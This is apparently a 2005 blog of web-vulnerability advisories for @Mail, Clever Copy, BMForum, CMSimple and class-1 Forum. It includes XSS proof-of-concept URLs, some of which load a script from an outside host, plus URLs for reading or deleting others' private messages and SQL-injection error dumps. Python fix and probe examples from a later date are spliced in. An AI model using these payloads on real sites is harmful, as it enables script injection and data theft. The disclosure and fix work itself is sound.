@Mail multiple variable cross-site scripting

Thursday, July 28, 2005
#############################################
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
OSVDB ID:18337,18338,18339,18340
Secunia: SA16252
BID: 14408
##############################################


@Mail is a feature-rich email solution that allows users to access
email resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s).


@Mail contains a flaw that allows remote cross-site scripting.
The flaw exists because the application does not validate
multiple variables upon submission to multiple scripts. This could
allow a user to create a specially crafted URL that would execute
arbitrary script code in a victim's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

#############
versions
#############

@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /

It is also possible that other versions are vulnerable.

#################
solution
#################

Apply patch for version 4.11.
http://calacode.com/patch.pl

#################
Timeline
#################

Discovered:02-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005


##################
Proof of concept
##################

Exploiting these flaws requires a client login; exploiting the
flaws in /webadmin/ requires an admin login.

###################
printcal.pl
###################

http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4

http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]

http://[victim]/printcal.pl?type=4[XSS-CODE]

###################
task.pl
###################

http://[victim]/task.pl?func=todo[XSS-CODE]

###################
compose.pl
####################

http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.[victim].com%3A2%2C&folder=Sent&cache=&func=reply&type=reply[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r

http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=&Bcc=[XSS-CODE]

http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=[XSS-CODE]&Bcc=

http://[victim]/compose.pl?func=new&To=lala@lala.es[XSS-CODE]&Cc=&Bcc=

###################
webadmin/filter.pl
###################

http://[victim]/webadmin/filter.pl?func=viewmailrelay&Order=IPaddress[XSS-CODE]

http://[victim]/webadmin/filter.pl?func=filter&Header=blacklist_from&Type=1[XSS-CODE]&View=1

http://[victim]/webadmin/filter.pl?func=filter&Header=blacklist_from[XSS-CODE]&Type=1&View=1

http://[victim]/webadmin/filter.pl?func=filter&Header=whitelist_from&Type=0&Display=1&Sort=value[XSS-CODE]&Type=1&View=1



######################## €nd ##########################

Thanks to estrella for being my light

Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what drives the mind....

Clever Copy Unauthorized read & delete Private Messages

Wednesday, July 27, 2005
################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################


Clever Copy is a free, fully scalable web site portal and news posting
system. You can run it as a very simple blog or ramp it up to a full
Content Management System.

Clever Copy contains a flaw that allows an authenticated user to read
and delete other users' private messages.

The flaw is triggered when an authenticated user directly requests a
specially crafted URL, gaining unauthorized access to other users'
private messages.

############
versions
############

Clever Copy 2.0
Clever Copy 2.0a

###############
Solution
###############

No solution at this time.

###################
Timeline
###################

Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005

###################
proof of concept
###################

First we must be logged in, so that we have access to private messages,
then go to this URL:

http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=read&ID=2&user=waltrapass

and we see message 2 of user waltrapass :)

op   = read or del
ID   = id of the message we want to view
name = username of the user who sent the private message
       (not necessary to view or delete a message)
user = username of the user whose PMs we are trying to view

To delete a message we can use a similar URL:

http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=del&ID=2&user=waltrapass
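As an added example (not Clever Copy's code, which is not on this page), the following Python model of the op/ID/user handling shows the authorization mistake and its fix. The SQLite table, the user names, the message bodies and the function names are constructed for the demonstration.

```python
# Added example, not Clever Copy code: a minimal model of the readpm.php
# op/ID/user handling described above, using an in-memory SQLite table.
# Table layout, user names, messages and function names are constructed.
import sqlite3


def make_store() -> sqlite3.Connection:
    """Constructed sample data: one private message per recipient."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pm (id INTEGER, sender TEXT, recipient TEXT, body TEXT)")
    db.executemany(
        "INSERT INTO pm VALUES (?, ?, ?, ?)",
        [(1, "pruebas", "attacker", "hello attacker"),
         (2, "pruebas", "waltrapass", "secret for waltrapass only")],
    )
    return db


def _pm_operation(db: sqlite3.Connection, owner: str, op: str, pm_id: int) -> str:
    """Perform op (read|del) on message pm_id in the mailbox of `owner`.
    Ownership is part of the WHERE clause, so a foreign message looks
    exactly like a missing one."""
    if op == "read":
        row = db.execute(
            "SELECT body FROM pm WHERE id=? AND recipient=?", (pm_id, owner)
        ).fetchone()
        return row[0] if row else "no such message"
    if op == "del":
        cur = db.execute("DELETE FROM pm WHERE id=? AND recipient=?", (pm_id, owner))
        db.commit()
        return f"deleted {cur.rowcount}"
    return "bad op"


def readpm_vulnerable(db, session_user, op, pm_id, user):
    """The flaw: being logged in is checked, but WHOSE mailbox to open is
    taken from the attacker-controlled 'user' query parameter."""
    if session_user is None:
        return "login required"
    return _pm_operation(db, user, op, pm_id)


def readpm_fixed(db, session_user, op, pm_id, user=None):
    """The fix: the mailbox owner is always the authenticated session user.
    The 'user' parameter is still accepted for URL compatibility but ignored."""
    if session_user is None:
        return "login required"
    return _pm_operation(db, session_user, op, pm_id)


if __name__ == "__main__":
    db = make_store()
    print("vulnerable:", readpm_vulnerable(db, "attacker", "read", 2, "waltrapass"))
    print("fixed:     ", readpm_fixed(db, "attacker", "read", 2, "waltrapass"))
```

Keeping the ownership predicate inside the query, rather than fetching the row and comparing afterwards, also means the fixed handler cannot leak whether a given ID exists in someone else's mailbox: "not yours" and "not there" return the same answer, which stops an attacker from enumerating other users' message IDs through a forbidden/not-found difference.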

##################### €nd #############################

Thanks to estrella for being my light
Thanks to http://www.osvdb.org/

Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what drives the mind....

Multiple Cross site scripting in BMForum

################################################
Multiple Cross site scripting in BMForum
vendor url:http://www.bmforum.com/
Advisory:http://lostmon.blogspot.com/2005/07/multiple-cross-site-scripting-in.html
Vendor notify:yes Exploit available:yes
OSVDB ID:18306,18307,18308,18309,18310,18311,18312,18313,18314
Secunia: SA16224
BID: 14396
################################################


BMForum contains a flaw that allows remote cross-site scripting.
The flaw exists because the application does not validate
multiple variables upon submission to multiple scripts. This could
allow a user to create a specially crafted URL that would execute
arbitrary script code in a victim's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.



####################
VERSIONS
####################

BMForum Datium! 3.0 RC4
BMForum Datium! 3.0 RC3
BMForum Datium! 3.0 RC2
BMForum Datium! 3.0 RC1
BMForum Plus! 3.0 RC4
BMForum Plus! 3.0 RC3
BMForum Plus! 3.0 RC2
BMForum Plus! 3.0 RC1
BMForum Plus!MX 3.0.0.5
BMForum Plus! 2.6.1


###################
Solution:
###################

No solution at this time.

###################
Timeline:
###################

Discovered: 21-07-2005
vendor notify:25-07-2005
Disclosure:27-07-2005

###################
Proof of XSS
####################

####################
topic.php
####################

http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]
http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2
http://[VICTIM]/topic.php?filename=1923[XSS-CODE]

#################
forums.php
#################

http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]


###################
post.php
###################

http://[VICTIM]/post.php?forumid=2\[XSS-CODE]

###################
announcesys.php
###################

http://[VICTIM]/announcesys.php?forumid=0[XSS-CODE]

#################
Others
#################

http://[VICTIM]/datafile/regipbans.php // banned IPs
http://[VICTIM]/bmb/datafile/sendmail.php // full path disclosure
http://[VICTIM]/post_global.php // full path disclosure
http://[VICTIM]/bmb/datafile/bbslog2.txt // data disclosure
http://[VICTIM]/bmb/bbslog.txt // data disclosure

################### €nd ######################

Thanks to estrella for being my light.

Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what drives the mind....

CMSimple 'search' variable XSS

Thursday, July 21, 2005
##############################################
CMSimple 'search' variable XSS
Vendor url:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################



CMSimple is a simple content management system for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!


CMSimple contains a flaw that allows remote cross-site scripting.
The flaw exists because the application does not validate the
'search' variable upon submission to the 'index.php' script. This could
allow a user to create a specially crafted URL that would execute
arbitrary script code in a victim's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

index.php contains only an include of the cmsimple/cms.php file.


#############
VERSIONS
#############

CMSimple 2.4 and earlier versions


#############
Solution
#############

vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470

Fix:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;

should be replaced with:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));

Will be fixed in next beta.
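To show what the one-line change buys, and one caveat that comes with it, here is an added Python model of printlink()'s output; it is not CMSimple code. The link template is an assumption about the markup the function builds around $t; htmlspecialchars() is re-implemented only far enough to mirror PHP's quote-flag behaviour, and stripslashes(), which merely removes the backslashes magic_quotes_gpc added to raw input, is not modelled.

```python
# Added example (not CMSimple code): Python model of the printlink() change
# above. Link template is assumed; htmlspecialchars() stand-in mirrors PHP's
# flag behaviour; stripslashes() is not modelled.
import html
from urllib.parse import quote_plus

# The payload from the proof of concept on this page, plus a constructed
# single-quote variant used to show the ENT_QUOTES caveat.
PAYLOAD_DQ = '"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>'
PAYLOAD_SQ = "' onmouseover='alert(1)"


def htmlspecialchars(s: str, ent_quotes: bool = False) -> str:
    """Stand-in for PHP htmlspecialchars(). ent_quotes=False mirrors the
    pre-PHP-8.1 default (ENT_COMPAT): &, <, > and " are encoded, ' is not."""
    out = html.escape(s, quote=False).replace('"', "&quot;")
    if ent_quotes:
        out = out.replace("'", "&#039;")
    return out


def printlink(search: str, encoder=None, q: str = '"') -> str:
    """Build the print link: the search value goes through `encoder`
    (None = the unfixed plain concatenation) into a q-quoted href."""
    value = search if encoder is None else encoder(search)
    return f"<a href={q}?&print&function=search&search={value}{q}>print</a>"


def attribute_intact(markup: str, q: str = '"') -> bool:
    """True if the href attribute still closes where the template closes it,
    i.e. the injected value did not break out of the quoted attribute."""
    start = markup.index("href=" + q) + len("href=" + q)
    end = markup.index(q, start)
    return markup[end:] == q + ">print</a>"


def verdicts() -> dict:
    """Run the payloads through the unfixed, fixed and stricter variants."""
    return {
        "unfixed": attribute_intact(printlink(PAYLOAD_DQ)),
        "vendor fix": attribute_intact(printlink(PAYLOAD_DQ, htmlspecialchars)),
        # URL-encode the query value first, then entity-encode for the attribute
        "urlencode+htmlspecialchars": attribute_intact(
            printlink(PAYLOAD_DQ, lambda s: htmlspecialchars(quote_plus(s), True))
        ),
        # Caveat: default flags leave the single quote alone, so the same fix on
        # a single-quoted attribute still allows attribute injection
        "vendor fix, single-quoted href": attribute_intact(
            printlink(PAYLOAD_SQ, htmlspecialchars, "'"), "'"
        ),
        "ENT_QUOTES, single-quoted href": attribute_intact(
            printlink(PAYLOAD_SQ, lambda s: htmlspecialchars(s, True), "'"), "'"
        ),
    }


if __name__ == "__main__":
    for name, ok in verdicts().items():
        print(f"{'intact' if ok else 'BROKEN':7} {name}")
```

The vendor's line does stop the reported break-out because the href is double-quoted and htmlspecialchars() encodes the double quote under its default flags. On the PHP releases current in 2005 the default did not encode the single quote (PHP 8.1 changed the default to include ENT_QUOTES), so pass ENT_QUOTES explicitly wherever the attribute could be single-quoted. Since $search ends up as a query-string value, urlencode()-ing it before the entity encoding is the context-correct treatment and round-trips the term unchanged.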

#############
Timeline
#############

discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005


################
Proof of concept
################

http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>



http://[victim]/?function=search&search=[XSS-CODE]

http://[victim]/?&print&function=search&search=[XSS-CODE]

http://[victim]/?License&function=search&search=[XSS-CODE]

http://[victim]/?Resellers&function=search&search=[XSS-CODE]

http://[victim]/?&guestbook&function=search&search=[XSS-CODE]


###################### €nd #########################

Thanks to estrella for being my light
Thanks to http://www.drorshalev.com/ for hosting the 'js.js' script
--
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what drives the mind....

Clever copy Path disclosure and XSS

Monday, July 18, 2005
################################################
Clever copy Path disclosure and XSS
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/clever-copy-path-disclosure-and-xss.html
vendor notify: yes exploit available:yes
OSVDB ID: 18349,18350,18351,18352,18353,18354,18355,
18356,18357,18358,18359,18360,18361
Secunia: SA16236
BID:14395
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system. You can run it as a very simple blog or ramp it up to a full
Content Management System.

Clever Copy contains a flaw that allows remote cross-site scripting.
The flaw exists because the application does not validate the
'searchtype' and 'searchterm' variables upon submission to the
'results.php' and 'categorysearch.php' scripts. This could allow a user
to create a specially crafted URL that would execute arbitrary script code in
a victim's browser within the trust relationship between the browser and
the server, leading to a loss of integrity.

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005

##############
EXPLOITS
##############

http://[VICTIM]/results.php?searchtype="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>category&searchterm=Announcements

http://[VICTIM]/results.php?searchtype=category&searchterm="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>Announcements

http://[VICTIM]/results.php?start=0&searchtype="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>category&searchterm=Announcements

http://[VICTIM]/results.php?start=0&searchtype=category&searchterm=Announcements"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>

http://[VICTIM]/categorysearch.php?star=0&searchtype="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>category&searchterm=Announcements

http://[VICTIM]/categorysearch.php?star=0&searchtype=category&searchterm=Announcements"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>

################################
direct request path disclosure:
################################

http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php


######################## €nd #############################

Thanks to estrella for being my light
Thanks to http://www.drorshalev.com/ for hosting the 'js.js' script
--
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what drives the mind....

Clever copy 'calendar.php' 'yr' variable cross site scripting

Friday, July 15, 2005
################################################
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system. You can run it as a very simple blog or ramp it up to a full
Content Management System.

Clever Copy contains a flaw that allows remote cross-site scripting.
The flaw exists because the application does not validate the 'yr'
variable upon submission to the 'calendar.php' script. This could allow a
user to create a specially crafted URL that would execute arbitrary
script code in a victim's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005

##############
EXPLOIT
##############

http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>

######################## €nd #############################

Thanks to estrella for being my light
--
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what drives the mind...

class-1 Forum Software Cross site scripting

Thursday, July 14, 2005
#########################################################
class-1 Forum Software Cross site scripting.
Original advisory:http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html
Vendor url:http://www.class1web.co.uk/download_forum.php
Vendor notify: yes exploit available: yes
OSVDB ID:17920,17921,17922,17923
Secunia: SA16078
BID: 14261
Securitytracker: 1014485 1014486
##########################################################


class-1 Forum Software is a PHP/MySQL driven web forum.

class-1 Forum contains a flaw that allows remote cross-site
scripting. The flaw exists because the application
does not validate the 'viewuser_id' and 'group' variables upon
submission to the 'users.php' script. This could allow a user to create
a specially crafted URL that would execute arbitrary script code in a victim's
browser within the trust relationship between the browser and
the server, leading to a loss of integrity.

##################
versions
##################

class-1 Forum Software (v 0.23.2) vulnerable.
class-1 Forum Software (v 0.24.4) vulnerable.

It is possible that other versions are vulnerable too.

Clever Copy (http://clevercopy.bestdirectbuy.com/) with the
affected forum module installed is also vulnerable:

Clever Copy 2.0
Clever Copy 2.0a

###################
Solution
###################

no solution at this time.

################
Timeline
################

discovered: 10-07-2005
vendor notify: 12-07-2005 (Webform)
vendor response:
2nd vendor response: 12-07-2005 (Clever Copy)
disclosure: 14-07-2005


##############################
proof of Cross site Scripting
##############################

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]

http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]
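The canary-based check below is an added example, not code from any of the advisories on this page. It takes [XSS-CODE] templates in the form used by the @Mail, BMForum, Clever Copy and class-1 proofs of concept above, substitutes a percent-encoded marker and classifies how the marker comes back in the response. The host name, the canary and the two stand-in servers (one echoing parameters raw, one entity-encoding them) are constructed so that it runs offline; replace `fetch` with a real HTTP client to use it against a test install.

```python
# Added example, not from any advisory on this page: canary probe for the
# [XSS-CODE] templates above. Host name, canary and the two stand-in
# "servers" are constructed so the probe runs without a network.
import html
import re
from typing import Callable
from urllib.parse import parse_qs, quote, urlsplit

HOST = "www.example.test"      # assumed; the advisories write [victim]
CANARY = "zlmq7"               # unlikely to occur naturally in a page
PAYLOAD = f'"><{CANARY}>'      # closes a double-quoted attribute, opens a tag

# Templates taken from the advisories on this page; the calendar.php one is
# the Clever Copy URL with its concrete payload replaced by the placeholder.
TEMPLATES = [
    "http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4",
    "http://[victim]/compose.pl?func=new&To=lala@lala.es&Cc=[XSS-CODE]&Bcc=",
    "http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]",
    "http://[victim]/calendar.php?mth=3&yr=2006[XSS-CODE]",
    "http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]",
]


def build_url(template: str) -> str:
    """Fill in the host and a percent-encoded canary payload; placeholders
    are matched case-insensitively ([victim]/[VICTIM], [XSS-CODE]/[XSS-code])."""
    url = re.sub(r"\[victim\]", HOST, template, flags=re.I)
    return re.sub(r"\[xss-code\]", quote(PAYLOAD, safe=""), url, flags=re.I)


def classify(body: str) -> str:
    """How did the canary come back in the response body?"""
    if PAYLOAD in body:
        return "vulnerable"        # reflected verbatim: the break-out works
    if html.escape(PAYLOAD, quote=True) in body:
        return "encoded"           # reflected, but entity-encoded
    return "not_reflected"


def probe(template: str, fetch: Callable[[str], str]) -> str:
    return classify(fetch(build_url(template)))


def probe_all(fetch: Callable[[str], str]) -> dict:
    return {t: probe(t, fetch) for t in TEMPLATES}


# --- constructed stand-ins for the server side (no network) ---------------
def _echo_page(url: str, escape: bool) -> str:
    """Echo every query parameter into a hidden form field, the pattern
    behind most of the reflected variables above."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    enc = (lambda s: html.escape(s, quote=True)) if escape else (lambda s: s)
    fields = "".join(
        f'<input type="hidden" name="{enc(k)}" value="{enc(v[0])}">'
        for k, v in params.items()
    )
    return f"<html><body><form>{fields}</form></body></html>"


def unpatched_server(url: str) -> str:
    return _echo_page(url, escape=False)


def patched_server(url: str) -> str:
    return _echo_page(url, escape=True)


if __name__ == "__main__":
    for server in (unpatched_server, patched_server):
        print(server.__name__)
        for template, verdict in probe_all(server).items():
            print(f"  {verdict:13} {template}")
```

An "encoded" verdict only means the value is safe where it was seen, in an attribute or text node. Entities do not protect a value reflected inside a script block or an unquoted attribute, so look at the markup around the reflection before closing a finding either way.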


#########################
possible SQL injections
#########################

http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]

SQL Error
There was an error executing the query - SELECT * FROM attachments
WHERE attach_id='''
You have an error in your SQL syntax near ''''' at line 1

-------

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]

There was an error executing the query - SELECT * FROM users
WHERE user_id='''
You have an error in your SQL syntax near ''''' at line 1

--------

http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]

There was an error executing the query - SELECT * FROM messages
WHERE id='''
You have an error in your SQL syntax near ''''' at line 1

---------

http://[victim]/forum/viewforum.php?forum=[SQL-Injection]

There was an error executing the query - SELECT * FROM group_permissions
WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'
You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1

----------
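The errors above all have the same shape: the request value is dropped between single quotes inside the statement, and the failed statement is echoed back to the client. The added example below (not class-1 code) reproduces that pattern against an in-memory SQLite table, next to the bound-parameter form and the quote/double-quote probe that tells the two apart. Table, rows and function names are constructed; SQLite's error text differs from MySQL's, but the cause is the same.

```python
# Added example, not class-1 Forum code: the query-construction pattern that
# produces the errors quoted above, reproduced against in-memory SQLite.
# Table, rows and function names are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one harmless and one sensitive attachment."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE attachments (attach_id TEXT, filename TEXT)")
    db.executemany("INSERT INTO attachments VALUES (?, ?)",
                   [("1", "notes.txt"), ("2", "private-report.zip")])
    return db


def viewattach_vulnerable(db: sqlite3.Connection, attach_id: str):
    """String-built query, like the one echoed in
    "SELECT * FROM attachments WHERE attach_id='''": a quote in the input
    becomes part of the SQL instead of part of the value."""
    sql = f"SELECT attach_id, filename FROM attachments WHERE attach_id='{attach_id}'"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError as err:
        # Echoing the failed statement is what let the advisory confirm the
        # injection point without a working exploit.
        return f"SQL Error: There was an error executing the query - {sql} ({err})"


def viewattach_fixed(db: sqlite3.Connection, attach_id: str):
    """Parameterised query: the value is bound by the driver, never parsed as SQL."""
    return db.execute(
        "SELECT attach_id, filename FROM attachments WHERE attach_id=?", (attach_id,)
    ).fetchall()


def quote_pair_probe(db: sqlite3.Connection, handler) -> str:
    """Classic confirmation: a lone quote breaks a string-built query, while a
    doubled quote (SQL's escape for ') parses fine. Only an injectable handler
    shows that difference; a bound parameter treats both as plain text."""
    one = handler(db, "'")
    two = handler(db, "''")
    if isinstance(one, str) and "error executing the query" in one and isinstance(two, list):
        return "injectable"
    return "not injectable"


if __name__ == "__main__":
    db = make_db()
    print(viewattach_vulnerable(db, "'"))
    print(viewattach_vulnerable(db, "' OR '1'='1"))
    print(quote_pair_probe(db, viewattach_vulnerable), quote_pair_probe(db, viewattach_fixed))
```

The `' OR '1'='1` call is the point of the exercise: the same concatenation that produces the syntax error turns `WHERE attach_id=''` into a condition that is true for every row, and in the forum that means every attachment, profile or message the query can reach. Binding the value fixes that; suppressing the error message alone does not.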
#################### €nd ###########################

Thanks to estrella for being my light
--
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what drives the mind....
 
